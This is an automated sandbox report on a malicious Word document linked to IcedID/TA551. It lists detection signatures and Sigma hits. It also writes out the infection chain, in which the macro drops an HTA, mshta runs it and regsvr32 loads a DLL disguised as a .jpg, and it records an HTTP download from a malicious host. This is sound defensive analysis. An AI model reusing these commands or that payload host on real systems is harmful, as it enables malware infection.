Windows Analysis Report charge_12.01.2021.doc

Overview

General Information

Sample Name: charge_12.01.2021.doc
Analysis ID: 532355
MD5: 18499830201cddade8183b8e24fdf30a
SHA1: 55c498cf7273cab567f49a00c15ca3316c001215
SHA256: 0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
Tags: Bokbot, doc, IcedID, macros, Shathak, TA551, Word

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Register DLL with spoofed extension
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Regsvr32 Anomaly
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Regsvr32 Command Line Without DLL
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Regsvr32 Execution With Image Extension
Queries the volume information (name, serial number etc) of a device
Document has an unknown application name
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Searches for user specific document files
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7128 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • explorer.exe (PID: 4756 cmdline: explorer youTube.hta MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • explorer.exe (PID: 5580 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • mshta.exe (PID: 5368 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • regsvr32.exe (PID: 6688 cmdline: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Suspicious MSHTA Process Patterns
Source: Process started, Author: Florian Roth, Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5580, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5368
Sigma detected: Regsvr32 Anomaly
Source: Process started, Author: Florian Roth, oscd.community, Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started, Author: Florian Roth, Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: Suspicious Regsvr32 Execution With Image Extension
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688

Data Obfuscation:

Sigma detected: Register DLL with spoofed extension
Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: Office product drops script at suspicious location
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ProcessId: 7128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\youTube.hta.LNK

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: charge_12.01.2021.doc, ReversingLabs: Detection: 29%
Machine Learning detection for sample
Source: charge_12.01.2021.doc, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Process created: C:\Windows\SysWOW64\explorer.exe
Source: global traffic, DNS query: name: winrentals2017b.com
Source: global traffic, TCP traffic: 192.168.2.3:49745 -> 194.62.42.207:80
Source: global traffic, HTTP traffic detected:
GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: winrentals2017b.com
Connection: Keep-Alive
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmp, String found in binary or memory: http://winrentals2017b.com/
Source: mshta.exe, 00000007.00000003.310025721.00000000090E3000.00000004.00000040.sdmp, mshta.exe, 00000007.00000003.310184034.0000000005AD2000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309172914.0000000009EB1000.00000004.00000001.sdmp, mshta.exe, 00000007.00000002.312682586.0000000005AD2000.00000004.00000001.sdmp, String found in binary or memory: http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBa
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/6
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://augloop.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://augloop.office.com/v2
Source: WINWORD.EXE, 00000001.00000003.417996939.00000000109AE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292292706.00000000109AE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571413486.00000000109AE000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comi
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: WINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.entity.
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: WINWORD.EXE, 00000001.00000002.571191483.0000000010861000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417530932.0000000010865000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey(
Source: WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxXK
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://config.edge.skype.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/OfficeQLL
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/OfficeaK
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cortana.ai
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cortana.ai/api
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai:$
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://cr.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.o365filtering.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com#
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com(
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com:7P
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comO
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comn
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comx7
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileK
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies6
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dev.cortana.ai
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
